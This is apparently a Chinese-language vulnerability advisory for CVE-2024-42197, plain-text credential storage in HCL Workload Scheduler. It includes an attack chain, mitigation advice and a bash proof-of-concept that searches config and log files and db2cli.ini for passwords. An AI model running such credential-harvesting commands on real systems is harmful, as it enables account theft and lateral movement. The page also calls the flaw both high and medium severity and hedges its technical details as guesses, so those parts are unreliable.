CVE-2024-42197 | HCL Workload Scheduler 明文存储凭证漏洞

漏洞信息

漏洞编号

CVE-2024-42197

漏洞类型

敏感信息泄露

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

HCL Workload Scheduler

漏洞概述

CVE-2024-42197是HCL Workload Scheduler中的一个高危安全漏洞，该漏洞允许本地低权限用户读取存储在明文形式下的用户凭证信息。HCL Workload Scheduler是一款企业级工作负载自动化调度软件，广泛应用于大型企业环境中用于管理和调度各类批处理任务、作业流程以及系统监控。由于该软件涉及企业核心业务系统的自动化运行，通常需要配置各类数据库账户、服务账户以及管理员账户来确保系统的正常运转。

漏洞的核心问题在于系统将用户凭证信息以明文形式存储在配置文件中、数据库中或日志文件中，而非采用加密或哈希机制进行保护。这意味着任何能够访问系统本地资源的低权限用户，都可以通过读取这些存储位置来获取明文凭证。一旦攻击者获取了这些凭证，特别是管理员或数据库账户凭证，就可能进一步横向移动到其他关键系统，获取更高权限访问，甚至可能导致整个企业基础设施的沦陷。

该漏洞的CVSS评分为5.5，属于中等严重程度。虽然攻击向量为本地（AV:L），需要攻击者具备本地访问权限，但其机密性影响为高（C:H），表明泄露的凭证信息可能对组织造成重大安全风险。鉴于HCL Workload Scheduler在企业环境中的关键作用，此类凭证泄露漏洞可能被高级持续性威胁（APT）组织利用，作为初始访问或横向移动的一部分。

技术细节

漏洞技术分析表明，HCL Workload Scheduler在存储用户认证凭证时存在设计缺陷。系统采用了不安全的存储机制，将用户密码、服务账户凭证以及其他敏感认证信息以明文形式写入配置文件或数据库表。

具体而言，问题可能存在于以下几个层面：

1. **配置文件不安全存储**：软件的配置文件（如config.properties、connection.properties等）中包含数据库连接字符串和用户凭证，这些文件通常权限设置不当，允许低权限用户读取。

2. **数据库明文存储**：某些版本的HCL Workload Scheduler可能在数据库的用户表或配置表中以明文形式存储密码，而非使用加密哈希或盐值存储机制。

3. **日志文件泄露**：系统在记录日志时可能将认证尝试、连接信息等内容完整输出到日志文件，包括明文密码。

4. **权限配置缺陷**：软件安装时的默认权限设置或升级过程中的权限重置，可能导致敏感文件的访问控制过于宽松。

利用此漏洞需要攻击者具备目标系统的本地访问权限。通过文件系统遍历、配置文件读取或日志文件分析，攻击者可以提取出明文存储的凭证信息。获取的凭证可用于：
- 访问HCL Workload Scheduler管理控制台
- 连接后端数据库获取更多敏感数据
- 作为跳板进一步渗透内网其他系统

修复方案应包括：对所有存储的凭证信息实施加密或哈希处理、修正文件权限设置、清理日志中的敏感信息，以及实施最小权限原则确保只有必要账户能够访问配置文件。

攻击链分析

STEP 1

步骤1: 本地访问获取

攻击者获得目标系统的本地访问权限，可能是通过合法账户、恶意软件或其他初始访问向量（如社会工程学攻击获取SSH凭据）

STEP 2

步骤2: 文件系统探测

攻击者在文件系统中搜索HCL Workload Scheduler的安装目录和相关配置文件，包括.properties、.xml、.config等格式的配置文件

STEP 3

步骤3: 凭证提取

通过读取配置文件中存储的明文凭证、数据库连接字符串或日志文件中记录的敏感信息，攻击者提取出用户名和密码

STEP 4

步骤4: 凭证验证

使用获取的明文凭证尝试登录HCL Workload Scheduler管理控制台或其他关联系统，验证凭证有效性

STEP 5

步骤5: 横向移动

成功登录后，攻击者可以执行管理操作、修改作业调度、访问敏感数据，并可能利用获取的数据库凭证进一步渗透内网

STEP 6

步骤6: 持久化控制

攻击者可能创建后门账户、修改作业调度为恶意任务，或将获取的凭证用于其他攻击链，形成持续性威胁

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2024-42197 PoC - HCL Workload Scheduler Plain Text Credential Disclosure
# Author: Security Researcher
# Note: This PoC is for authorized security testing only

TARGET_HOST="target-server.local"
INSTALL_PATH="/opt/HCL/WorkloadScheduler"

echo "[*] CVE-2024-42197 PoC - HCL Workload Scheduler Credential Disclosure"
echo "[*] Target: $TARGET_HOST"

# Check for common configuration files containing credentials
echo "[+] Searching for configuration files..."
find "$INSTALL_PATH" -name "*.properties" -o -name "*.xml" -o -name "*.config" 2>/dev/null | while read file; do
    echo "[Found] $file"
    # Check for password patterns in configuration files
    grep -i -E "(password|passwd|pwd|credential|secret|key)" "$file" 2>/dev/null && echo "[!] Potential credentials in: $file"
done

# Check database connection configuration
echo "[+] Checking database configuration files..."
DB_CONFIG="$INSTALL_PATH/TWS/config/db2cli.ini"
if [ -f "$DB_CONFIG" ]; then
    cat "$DB_CONFIG" | grep -E "(UID|PWD|user|password)" && echo "[!] Database credentials exposed"
fi

# Check for log files with potential credential leakage
echo "[+] Searching log files for credentials..."
find "$INSTALL_PATH" -name "*.log" 2>/dev/null | while read logfile; do
    grep -i -E "password.*=|pwd.*=|connecting.*user" "$logfile" 2>/dev/null && echo "[!] Credentials in log: $logfile"
done

# Check file permissions
echo "[+] Checking file permissions on sensitive files..."
ls -la "$INSTALL_PATH/TWS/config/" 2>/dev/null

echo "[+] PoC completed. Review output for exposed credentials."

影响范围

HCL Workload Scheduler < 9.5.0.2

HCL Workload Scheduler < 9.4.0.6

HCL Workload Scheduler < 8.x (all versions)

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：首先，立即限制对HCL Workload Scheduler安装目录及配置文件的访问权限，将文件权限修改为仅允许root和服务账户读取；其次，清理所有可能包含明文凭证的日志文件，并配置日志系统避免记录敏感信息；第三，定期检查系统账户和权限配置，移除不必要的本地访问权限；第四，启用审计日志并监控对配置目录的访问行为，及时发现异常访问尝试；最后，考虑实施网络隔离措施，将HCL Workload Scheduler部署在独立的VLAN中，并限制从其他系统对该服务器的访问。